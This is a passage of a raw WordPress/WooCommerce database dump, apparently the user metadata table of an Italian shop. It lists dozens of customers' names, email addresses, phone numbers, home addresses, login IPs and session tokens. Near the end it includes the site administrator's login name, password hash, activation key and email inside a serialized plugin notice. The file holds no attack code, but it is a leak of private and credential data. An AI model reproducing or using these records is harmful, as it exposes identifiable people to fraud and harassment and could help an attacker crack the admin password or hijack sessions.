(iPhone; CPU iPhone OS 12_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1\";s:5:\"login\";i:1549996560;}}'),(1225,45,'last_update','1549996560'),(1226,45,'billing_first_name','Dino'),(1227,45,'billing_last_name','Cedalo'),(1228,45,'billing_address_1','Via Pittulo orso 25'),(1229,45,'billing_city','San Marino'),(1230,45,'billing_email','Denn7401@gmail.com'),(1231,45,'billing_phone','335291370'),(1232,45,'shipping_method',''),(1233,45,'wc_last_active','1549929600'),(1234,45,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1237,7,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"48aedb8880cab8c45637abc7493ecddd\";a:11:{s:3:\"key\";s:32:\"48aedb8880cab8c45637abc7493ecddd\";s:10:\"product_id\";i:288;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b5c1d5ca8bae6d4896cf1807cdf763f0\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:30;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:30;s:8:\"line_tax\";i:0;}}}'),(1238,7,'syntax_highlighting','true'),(1239,7,'shipping_method',''),(1240,46,'nickname','sara-fabbri'),(1241,46,'first_name','Sara'),(1242,46,'last_name','Fabbri'),(1243,46,'description',''),(1244,46,'rich_editing','true'),(1245,46,'syntax_highlighting','true'),(1246,46,'comment_shortcuts','false'),(1247,46,'admin_color','fresh'),(1248,46,'use_ssl','0'),(1249,46,'show_admin_bar_front','true'),(1250,46,'locale',''),(1251,46,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1252,46,'wp_user_level','0'),(1253,46,'dismissed_wp_pointers','wp496_privacy'),(1254,46,'_yoast_wpseo_profile_updated','1550142228'),(1255,46,'session_tokens','a:1:{s:64:\"5d147ed17d9922261ab01e7578c12b2ef3c26b67a118d9641c3600a35200d41f\";a:4:{s:10:\"expiration\";i:1551351828;s:2:\"ip\";s:13:\"37.160.26.248\";s:2:\"ua\";s:135:\"Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1\";s:5:\"login\";i:1550142228;}}'),(1257,46,'last_update','1550142228'),(1258,46,'billing_first_name','Sara'),(1259,46,'billing_last_name','Fabbri'),(1260,46,'billing_city','Cesenatico'),(1261,46,'billing_email','sara-fabbri@hotmail.it'),(1262,46,'billing_phone','3490964128'),(1263,46,'shipping_method',''),(1264,46,'wc_last_active','1550188800'),(1265,46,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1271,1,'dismissed_wootenberg_notice','1'),(1272,47,'nickname','christinaamplatz'),(1273,47,'first_name','Christina'),(1274,47,'last_name','Amplatz'),(1275,47,'description',''),(1276,47,'rich_editing','true'),(1277,47,'syntax_highlighting','true'),(1278,47,'comment_shortcuts','false'),(1279,47,'admin_color','fresh'),(1280,47,'use_ssl','0'),(1281,47,'show_admin_bar_front','true'),(1282,47,'locale',''),(1283,47,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1284,47,'wp_user_level','0'),(1285,47,'dismissed_wp_pointers','wp496_privacy'),(1286,47,'_yoast_wpseo_profile_updated','1552403326'),(1287,47,'session_tokens','a:1:{s:64:\"4d5a32948416fc443482740669f1f3afaf30dc815be5b923fbbd277e54e9cf28\";a:4:{s:10:\"expiration\";i:1553612926;s:2:\"ip\";s:13:\"89.190.176.75\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\";s:5:\"login\";i:1552403326;}}'),(1289,47,'last_update','1552404825'),(1290,47,'billing_first_name','Christina'),(1291,47,'billing_last_name','Amplatz'),(1292,47,'billing_address_1','Kirchplatz'),(1293,47,'billing_city','Montan'),(1294,47,'billing_email','christinaamplatz@gmail.com'),(1295,47,'billing_phone','3497855617'),(1296,47,'shipping_method',''),(1297,47,'wc_last_active','1552348800'),(1299,47,'paying_customer','1'),(1300,47,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1303,48,'nickname','valezones'),(1304,48,'first_name','Valentina'),(1305,48,'last_name','ciuffoli'),(1306,48,'description',''),(1307,48,'rich_editing','true'),(1308,48,'syntax_highlighting','true'),(1309,48,'comment_shortcuts','false'),(1310,48,'admin_color','fresh'),(1311,48,'use_ssl','0'),(1312,48,'show_admin_bar_front','true'),(1313,48,'locale',''),(1314,48,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1315,48,'wp_user_level','0'),(1316,48,'dismissed_wp_pointers','wp496_privacy'),(1317,48,'_yoast_wpseo_profile_updated','1553534072'),(1318,48,'session_tokens','a:1:{s:64:\"5c711a9f27c84f445c1980d750f1f2bdee421760e08fbb2902cc388f2cd52c6d\";a:4:{s:10:\"expiration\";i:1554743672;s:2:\"ip\";s:13:\"195.81.11.130\";s:2:\"ua\";s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\";s:5:\"login\";i:1553534072;}}'),(1319,48,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"bef00701137bd4084df5a3bda73d90df\";a:12:{s:12:\"product_meta\";a:1:{s:9:\"meta_data\";a:6:{s:16:\"mwb_wgm_to_email\";s:15:\"Silvia Saragoni\";s:17:\"mwb_wgm_from_name\";s:19:\"le amiche di sempre\";s:15:\"mwb_wgm_message\";s:105:\"DOPO I 40 ANNI NOI DONNE NON COMPIAMO GLI ANNI....\r\nSALIAMO DI LIVELLO IN BELLEZZA, SAGGEZZA ED INCANTO..\";s:15:\"delivery_method\";s:12:\"Downloadable\";s:13:\"mwb_wgm_price\";s:2:\"70\";s:18:\"mwb_wgm_browse_img\";s:12:\"IMG_1608.jpg\";}}s:3:\"key\";s:32:\"bef00701137bd4084df5a3bda73d90df\";s:10:\"product_id\";i:548;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b79ba8791f445b078b67e850e44d8677\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:70;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:70;s:8:\"line_tax\";i:0;}}}'),(1320,48,'last_update','1553534143'),(1321,48,'billing_first_name','Valentina'),(1322,48,'billing_last_name','ciuffoli'),(1323,48,'billing_email','valezones@yahoo.it'),(1324,48,'billing_phone','3346149862'),(1325,48,'shipping_method',''),(1326,48,'wc_last_active','1553472000'),(1329,49,'nickname','fabio.santini'),(1330,49,'first_name','Fabio'),(1331,49,'last_name','Santini'),(1332,49,'description',''),(1333,49,'rich_editing','true'),(1334,49,'syntax_highlighting','true'),(1335,49,'comment_shortcuts','false'),(1336,49,'admin_color','fresh'),(1337,49,'use_ssl','0'),(1338,49,'show_admin_bar_front','true'),(1339,49,'locale',''),(1340,49,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1341,49,'wp_user_level','0'),(1342,49,'dismissed_wp_pointers','wp496_privacy'),(1343,49,'_yoast_wpseo_profile_updated','1554406282'),(1346,49,'last_update','1554406282'),(1347,49,'billing_first_name','Fabio'),(1348,49,'billing_last_name','Santini'),(1349,49,'billing_address_1','Via Senofonte 2/A'),(1350,49,'billing_city','Milano'),(1351,49,'billing_email','fabio.santini@remediasrl.com'),(1352,49,'billing_phone','+39335427626'),(1353,49,'shipping_method',''),(1354,49,'wc_last_active','1554336000'),(1355,49,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1360,50,'nickname','Glamroom86'),(1361,50,'first_name','Francesco'),(1362,50,'last_name','Fuochi'),(1363,50,'description',''),(1364,50,'rich_editing','true'),(1365,50,'syntax_highlighting','true'),(1366,50,'comment_shortcuts','false'),(1367,50,'admin_color','fresh'),(1368,50,'use_ssl','0'),(1369,50,'show_admin_bar_front','true'),(1370,50,'locale',''),(1371,50,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1372,50,'wp_user_level','0'),(1373,50,'dismissed_wp_pointers','wp496_privacy'),(1374,50,'_yoast_wpseo_profile_updated','1555249240'),(1375,50,'session_tokens','a:1:{s:64:\"0bbe1ad639d4beb4111441d3eb9c759d9dfee9568587affac00da8d9fbceed59\";a:4:{s:10:\"expiration\";i:1556458840;s:2:\"ip\";s:14:\"188.217.45.154\";s:2:\"ua\";s:135:\"Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 Safari/604.1\";s:5:\"login\";i:1555249240;}}'),(1377,50,'last_update','1555249439'),(1378,50,'billing_first_name','Francesco'),(1379,50,'billing_last_name','Fuochi'),(1380,50,'billing_email','Glamroom86@gmail.com'),(1381,50,'billing_phone','3349445431'),(1382,50,'shipping_method',''),(1383,50,'wc_last_active','1555804800'),(1384,50,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1385,51,'nickname','Oliunea'),(1386,51,'first_name','Olga'),(1387,51,'last_name','Rosca'),(1388,51,'description',''),(1389,51,'rich_editing','true'),(1390,51,'syntax_highlighting','true'),(1391,51,'comment_shortcuts','false'),(1392,51,'admin_color','fresh'),(1393,51,'use_ssl','0'),(1394,51,'show_admin_bar_front','true'),(1395,51,'locale',''),(1396,51,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1397,51,'wp_user_level','0'),(1398,51,'dismissed_wp_pointers','wp496_privacy'),(1399,51,'_yoast_wpseo_profile_updated','1555350915'),(1400,51,'session_tokens','a:1:{s:64:\"533d01b0187944321058a6a54701ebfcddab8e45bb183b41386d37a227a8a506\";a:4:{s:10:\"expiration\";i:1556560516;s:2:\"ip\";s:11:\"93.40.4.232\";s:2:\"ua\";s:218:\"Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/16D57 Instagram 88.0.0.17.98 (iPhone10,6; iOS 12_1_4; it_IT; it-IT; scale=3.00; gamut=wide; 1125x2436; 148910483)\";s:5:\"login\";i:1555350916;}}'),(1401,51,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"6faa8040da20ef399b63a72d0e4ab575\";a:11:{s:3:\"key\";s:32:\"6faa8040da20ef399b63a72d0e4ab575\";s:10:\"product_id\";i:329;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b5c1d5ca8bae6d4896cf1807cdf763f0\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:120;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:120;s:8:\"line_tax\";i:0;}}}'),(1402,51,'last_update','1555350916'),(1403,51,'billing_first_name','Olga'),(1404,51,'billing_last_name','Rosca'),(1405,51,'billing_address_1','Vi Gerrardo Dottori 94'),(1406,51,'billing_city','oliunea@icloud.com'),(1407,51,'billing_email','Oliunea@icloud.com'),(1408,51,'billing_phone','3279393542'),(1409,51,'shipping_method',''),(1410,51,'wc_last_active','1555286400'),(1412,52,'nickname','natalinofaina567'),(1413,52,'first_name','Riccardo'),(1414,52,'last_name','Bortolamasi'),(1415,52,'description',''),(1416,52,'rich_editing','true'),(1417,52,'syntax_highlighting','true'),(1418,52,'comment_shortcuts','false'),(1419,52,'admin_color','fresh'),(1420,52,'use_ssl','0'),(1421,52,'show_admin_bar_front','true'),(1422,52,'locale',''),(1423,52,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1424,52,'wp_user_level','0'),(1425,52,'dismissed_wp_pointers','wp496_privacy'),(1426,52,'_yoast_wpseo_profile_updated','1555506143'),(1427,52,'session_tokens','a:2:{s:64:\"4bc455c7b3a23596d73b0d37cd8c46176fb530ab767e20bc1847f44129a33c4a\";a:4:{s:10:\"expiration\";i:1556715743;s:2:\"ip\";s:14:\"158.148.78.174\";s:2:\"ua\";s:142:\"Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/72.0.3626.101 Mobile/15E148 Safari/605.1\";s:5:\"login\";i:1555506143;}s:64:\"05060daa4db747e9f8b7ddc40830abfd585068eb6c9e3be432f99f87728529c3\";a:4:{s:10:\"expiration\";i:1556739364;s:2:\"ip\";s:13:\"158.148.68.29\";s:2:\"ua\";s:135:\"Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 Safari/604.1\";s:5:\"login\";i:1555529764;}}'),(1428,52,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1429,52,'last_update','1555506143'),(1430,52,'billing_first_name','Riccardo'),(1431,52,'billing_last_name','Bortolamasi'),(1432,52,'billing_email','natalinofaina567@hotmail.it'),(1433,52,'billing_phone','3462109202'),(1434,52,'shipping_method',''),(1435,52,'wc_last_active','1555545600'),(1439,53,'nickname','zzzale'),(1440,53,'first_name','Alessandro'),(1441,53,'last_name','Zappa'),(1442,53,'description',''),(1443,53,'rich_editing','true'),(1444,53,'syntax_highlighting','true'),(1445,53,'comment_shortcuts','false'),(1446,53,'admin_color','fresh'),(1447,53,'use_ssl','0'),(1448,53,'show_admin_bar_front','true'),(1449,53,'locale',''),(1450,53,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1451,53,'wp_user_level','0'),(1452,53,'dismissed_wp_pointers','wp496_privacy'),(1453,53,'_yoast_wpseo_profile_updated','1555752328'),(1454,53,'session_tokens','a:1:{s:64:\"6efe8044a3dd10e2a97549cf776f122e6f5497dcad30889779d1b82cc88f8163\";a:4:{s:10:\"expiration\";i:1556961928;s:2:\"ip\";s:13:\"79.54.209.165\";s:2:\"ua\";s:123:\"Mozilla/5.0 (Linux; Android 8.0.0; ANE-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36\";s:5:\"login\";i:1555752328;}}'),(1456,53,'last_update','1555752328'),(1457,53,'billing_first_name','Alessandro'),(1458,53,'billing_last_name','Zappa'),(1459,53,'billing_email','zzzale@gmail.com'),(1460,53,'billing_phone','3472440411'),(1461,53,'shipping_method',''),(1462,53,'wc_last_active','1555891200'),(1463,53,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1465,54,'nickname','Fbambulatorio'),(1466,54,'first_name','Fabio'),(1467,54,'last_name','Bertelli'),(1468,54,'description',''),(1469,54,'rich_editing','true'),(1470,54,'syntax_highlighting','true'),(1471,54,'comment_shortcuts','false'),(1472,54,'admin_color','fresh'),(1473,54,'use_ssl','0'),(1474,54,'show_admin_bar_front','true'),(1475,54,'locale',''),(1476,54,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1477,54,'wp_user_level','0'),(1478,54,'dismissed_wp_pointers','wp496_privacy'),(1479,54,'_yoast_wpseo_profile_updated','1555783646'),(1480,54,'session_tokens','a:1:{s:64:\"e6ad7ac229f70c42c4eef1b7504cae3999902bcb0a0f4314290367f1b437bf46\";a:4:{s:10:\"expiration\";i:1556993247;s:2:\"ip\";s:12:\"2.35.189.252\";s:2:\"ua\";s:132:\"Mozilla/5.0 (iPad; CPU OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/73.0.3683.68 Mobile/15E148 Safari/605.1\";s:5:\"login\";i:1555783647;}}'),(1482,54,'last_update','1555783647'),(1483,54,'billing_first_name','Fabio'),(1484,54,'billing_last_name','Bertelli'),(1485,54,'billing_address_1','Via cagnacci 29'),(1486,54,'billing_city','Rimini'),(1487,54,'billing_email','Fbambulatorio@gmail.com'),(1488,54,'billing_phone','3386471737'),(1489,54,'shipping_method',''),(1490,54,'wc_last_active','1555718400'),(1492,54,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1493,55,'nickname','fabio.domenichini92'),(1494,55,'first_name','Fabio'),(1495,55,'last_name','Domenichini'),(1496,55,'description',''),(1497,55,'rich_editing','true'),(1498,55,'syntax_highlighting','true'),(1499,55,'comment_shortcuts','false'),(1500,55,'admin_color','fresh'),(1501,55,'use_ssl','0'),(1502,55,'show_admin_bar_front','true'),(1503,55,'locale',''),(1504,55,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1505,55,'wp_user_level','0'),(1506,55,'dismissed_wp_pointers','wp496_privacy'),(1507,55,'_yoast_wpseo_profile_updated','1556039164'),(1508,55,'session_tokens','a:1:{s:64:\"82b99746b9aa83fd1fe08a41ae2eac2589f54fb753883dcf27ad3896b27aa343\";a:4:{s:10:\"expiration\";i:1557248769;s:2:\"ip\";s:11:\"79.42.48.74\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:5:\"login\";i:1556039169;}}'),(1510,55,'last_update','1556039683'),(1511,55,'billing_first_name','Fabio'),(1512,55,'billing_last_name','Domenichini'),(1513,55,'billing_email','fabio.domenichini92@gmail.com'),(1514,55,'billing_phone','3491228579'),(1515,55,'shipping_method',''),(1516,55,'wc_last_active','1555977600'),(1517,55,'paying_customer','1'),(1518,55,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1519,56,'nickname','rebeccapedrazzi97'),(1520,56,'first_name','rebecca'),(1521,56,'last_name','pedrazzi'),(1522,56,'description',''),(1523,56,'rich_editing','true'),(1524,56,'syntax_highlighting','true'),(1525,56,'comment_shortcuts','false'),(1526,56,'admin_color','fresh'),(1527,56,'use_ssl','0'),(1528,56,'show_admin_bar_front','true'),(1529,56,'locale',''),(1530,56,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1531,56,'wp_user_level','0'),(1532,56,'dismissed_wp_pointers','wp496_privacy'),(1533,56,'_yoast_wpseo_profile_updated','1559744847'),(1534,56,'session_tokens','a:1:{s:64:\"d8a2e43edcd778d96005d364d1dac2dcc81e4606368291912bcccad5ae8e4313\";a:4:{s:10:\"expiration\";i:1560954450;s:2:\"ip\";s:14:\"188.218.87.200\";s:2:\"ua\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36\";s:5:\"login\";i:1559744850;}}'),(1536,56,'last_update','1559745025'),(1537,56,'billing_first_name','rebecca'),(1538,56,'billing_last_name','pedrazzi'),(1539,56,'billing_city','modena'),(1540,56,'billing_email','rebeccapedrazzi97@gmail.com'),(1541,56,'billing_phone','3489885788'),(1542,56,'shipping_method',''),(1543,56,'wc_last_active','1559692800'),(1545,56,'paying_customer','1'),(1546,56,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1548,1,'_woocommerce_tracks_anon_id','woo:RQOlGH0LcTDLkKCejEYv+A/Z'),(1549,1,'qlwcdc-user-rating','1'),(1552,57,'nickname','mariadyatlova'),(1553,57,'first_name','Maria'),(1554,57,'last_name','Dyatlova'),(1555,57,'description',''),(1556,57,'rich_editing','true'),(1557,57,'syntax_highlighting','true'),(1558,57,'comment_shortcuts','false'),(1559,57,'admin_color','fresh'),(1560,57,'use_ssl','0'),(1561,57,'show_admin_bar_front','true'),(1562,57,'locale',''),(1563,57,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1564,57,'wp_user_level','0'),(1565,57,'dismissed_wp_pointers',''),(1566,57,'_yoast_wpseo_profile_updated','1565793280'),(1567,57,'session_tokens','a:1:{s:64:\"9436b464ffbc5bc265ad177c540406f5f597689512060027fdfcbbac093968c6\";a:4:{s:10:\"expiration\";i:1567002880;s:2:\"ip\";s:11:\"151.36.13.0\";s:2:\"ua\";s:192:\"Mozilla/5.0 (Linux; U; Android 9; it-it; Redmi 7 Build/PKQ1.181021.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/61.0.3163.128 Mobile Safari/537.36 XiaoMi/MiuiBrowser/10.7.2-g\";s:5:\"login\";i:1565793280;}}'),(1569,57,'last_update','1565793638'),(1570,57,'billing_first_name','Maria'),(1571,57,'billing_last_name','Dyatlova'),(1572,57,'billing_city','Rimini'),(1573,57,'billing_email','maria11556@mail.ru'),(1574,57,'billing_phone','3899376641'),(1575,57,'shipping_method',''),(1576,57,'wc_last_active','1565740800'),(1577,57,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1579,2,'_woocommerce_tracks_anon_id','woo:AAc07O82pmLnoRy4MiSjBFcl'),(1580,2,'closedpostboxes_dashboard','a:0:{}'),(1581,2,'metaboxhidden_dashboard','a:0:{}'),(1584,2,'closedpostboxes_page','a:1:{i:0;s:10:\"wpseo_meta\";}'),(1585,2,'metaboxhidden_page','a:5:{i:0;s:10:\"postcustom\";i:1;s:16:\"commentstatusdiv\";i:2;s:11:\"commentsdiv\";i:3;s:7:\"slugdiv\";i:4;s:9:\"authordiv\";}'),(1588,58,'nickname','roberto.zanasi'),(1589,58,'first_name','Roberto'),(1590,58,'last_name','Zanasi'),(1591,58,'description',''),(1592,58,'rich_editing','true'),(1593,58,'syntax_highlighting','true'),(1594,58,'comment_shortcuts','false'),(1595,58,'admin_color','fresh'),(1596,58,'use_ssl','0'),(1597,58,'show_admin_bar_front','true'),(1598,58,'locale',''),(1599,58,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1600,58,'wp_user_level','0'),(1601,58,'dismissed_wp_pointers',''),(1602,58,'_yoast_wpseo_profile_updated','1576688970'),(1603,58,'session_tokens','a:1:{s:64:\"68321d99cfa603087ec9d3f2bdfb4721cc4ead1b5e9193b664a0a53c48aebe4f\";a:4:{s:10:\"expiration\";i:1577898571;s:2:\"ip\";s:11:\"5.170.83.10\";s:2:\"ua\";s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36\";s:5:\"login\";i:1576688971;}}'),(1604,58,'last_update','1577026893'),(1605,58,'billing_first_name','Roberto'),(1606,58,'billing_last_name','Zanasi'),(1607,58,'billing_email','zanasi76@gmail.com'),(1608,58,'billing_phone','335-5303146'),(1609,58,'shipping_method',''),(1610,58,'wc_last_active','1576972800'),(1611,58,'paying_customer','1'),(1612,58,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"41b2c93088a0e794805d14cf5ae57984\";a:6:{s:3:\"key\";s:32:\"41b2c93088a0e794805d14cf5ae57984\";s:10:\"product_id\";i:875;s:12:\"variation_id\";i:881;s:9:\"variation\";a:1:{s:27:\"attribute_pa_numero-coperti\";s:1:\"2\";}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"0b317e186a68c0410c864bd6e875e898\";}}}'),(1613,58,'_woocommerce_tracks_anon_id','woo:fQtUhXdOy59RpLc3ptjMLtND'),(1617,1,'wp_yoast_notifications','a:3:{i:0;a:2:{s:7:\"message\";s:592:\"<strong>New in Yoast SEO 15.6: </strong>In the latest version of Yoast SEO, you’ll find a number of bug fixes and performance enhancements. And install the free Yoast Duplicate Post plugin to unlock the Rewrite & Republish feature, offering you the possibility to update a post/page without taking it offline or having to take extra steps! <a href=\"https://yoa.st/yoast15-6?php_version=7.3&#038;platform=wordpress&#038;platform_version=5.6&#038;software=free&#038;software_version=15.6.2&#038;days_active=30plus&#038;user_language=en_US\" target=\"_blank\">Read all about version 15.6 here</a>\";s:7:\"options\";a:10:{s:4:\"type\";s:7:\"updated\";s:2:\"id\";s:20:\"wpseo-plugin-updated\";s:4:\"user\";O:7:\"WP_User\":8:{s:4:\"data\";O:8:\"stdClass\":10:{s:2:\"ID\";s:1:\"1\";s:10:\"user_login\";s:12:\"magnaromagna\";s:9:\"user_pass\";s:34:\"$P$BkkSGlLHuDLn5NW/AiQhY6T8/vMnx10\";s:13:\"user_nicename\";s:12:\"magnaromagna\";s:10:\"user_email\";s:25:\"webmaster@baldisserri.com\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2015-07-29 12:22:27\";s:19:\"user_activation_key\";s:45:\"1544810446:$P$BfTTJ5L7pImNFROOpw/uDyANfItmMT.\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:12:\"magnaromagna\";}s:2:\"ID\";i:1;s:4:\"caps\";a:13:{s:13:\"administrator\";b:1;s:26:\"wpcf_custom_post_type_view\";b:1;s:26:\"wpcf_custom_post_type_edit\";b:1;s:33:\"wpcf_custom_post_type_edit_others\";b:1;s:25:\"wpcf_custom_taxonomy_view\";b:1;s:25:\"wpcf_custom_taxonomy_edit\";b:1;s:32:\"wpcf_custom_taxonomy_edit_others\";b:1;s:22:\"wpcf_custom_field_view\";b:1;s:22:\"wpcf_custom_field_edit\";b:1;s:29:\"wpcf_custom_field_edit_others\";b:1;s:25:\"wpcf_user_meta_field_view\";b:1;s:25:\"wpcf_user_meta_field_edit\";b:1;s:32:\"wpcf_user_meta_field_edit_others\";b:1;}s:7:\"cap_key\";s:15:\"wp_capabilities\";s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:7:\"allcaps\";a:164:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:26:\"wpcf_custom_post_type_view\";b:1;s:26:\"wpcf_custom_post_type_edit\";b:1;s:33:\"wpcf_custom_post_type_edit_others\";b:1;s:25:\"wpcf_custom_taxonomy_view\";b:1;s:25:\"wpcf_custom_taxonomy_edit\";b:1;s:32:\"wpcf_custom_taxonomy_edit_others\";b:1;s:22:\"wpcf_custom_field_view\";b:1;s:22:\"wpcf_custom_field_edit\";b:1;s:29:\"wpcf_custom_field_edit_others\";b:1;s:25:\"wpcf_user_meta_field_view\";b:1;s:25:\"wpcf_user_meta_field_edit\";b:1;s:32:\"wpcf_user_meta_field_edit_others\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\